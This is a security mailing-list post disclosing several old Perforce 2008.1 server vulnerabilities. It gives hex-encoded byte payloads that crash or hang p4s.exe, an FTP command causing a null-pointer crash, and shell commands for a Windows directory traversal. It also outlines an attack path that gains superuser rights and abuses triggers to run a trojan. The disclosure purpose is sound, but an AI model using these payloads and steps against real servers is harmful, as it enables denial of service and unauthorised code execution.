Perforce

[Intevydis <admin () vulndisco net>]

Hi,


Usually I tend to ignore articles related to "sophisticated" aurora
attacks but according to
http://www.wired.com/threatlevel/2010/03/source-code-hacks many
companies use Perforce, big surprise..

About two years ago we've performed a quick testing of Perforce 2008.1
and released some bugs with Vulndisco:

1. p4s.exe DoS (crash)

to trigger send the following data to port "

s="\x4c\xb3\xff\xff\xff\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"

s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"


2. p4s.exe Dos (infinite loop)

to trigger:

s="\x1b\x1b\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"

s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\xdc\xff\xff\xff\x36\x33\x00"


3. another p4s.exe crash:


s="\x4c\x4c\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"

s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"

s+="\x61\x70\x69\x00\x0c\xff\xff\xff\x39\x39\x39\x39\x39\x00\x73\x6e"

s+="\x64\x62\x75\x66\x00\x05\x00\x00\x00\x36\x35\x35\x33\x36\x00\x66"

s+="\x75\x6e\x63\x00\x08\x00\x00\x00\x70\x72\x6f\x74\x6f\x63\x6f\x6c"
s+="\x00"

4. perforce Ftp server null ptr crash

to trigger -    "MKD x\r\n"


5. Perforce dir traversal

Trivial bug, on Windows it is possible to create files outside of
repository directory, something like:
$ echo TESTTEST > "..\\..\\..\\..\\..\\..\\..\\test.txt"
$ p4 add "..\\..\\..\\..\\..\\..\\..\\test.txt"
//depot/..\..\..\..\..\..\..\test.txt#1 - opened for add
$ p4 submit

on Windows box file C:\test.txt,v will be created


6. remote exploit
We've exploted triggers feature of Perforce server , triggers allows us
to run external OS commands. To use this bug you will need account
with 'super' privileges', how you can get it:
1. easy way - there is an empty protection table, so the first user who
will run 'p4 protect' will be superuser (another nice feature of Perforce)
2. hard way - run 'p4 protects', see who has super privileges and brute
force his account

So, in our exploit we've been using 'form-in' trigger, it will be fired
each time when we try define new client ('p4 client'). Our trigger saves
mosdef callback trojan in /tmp and executes it.

Of course all these bugs might be fixed now - no surprise, we've found
them ~ 2 years ago.

Do not get me wrong, our perforce's skill level is nothing compared to
mcafee experts, we are just scripts kiddies playing with wireshark and
netcat.

Regards,
Evgeny L.
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave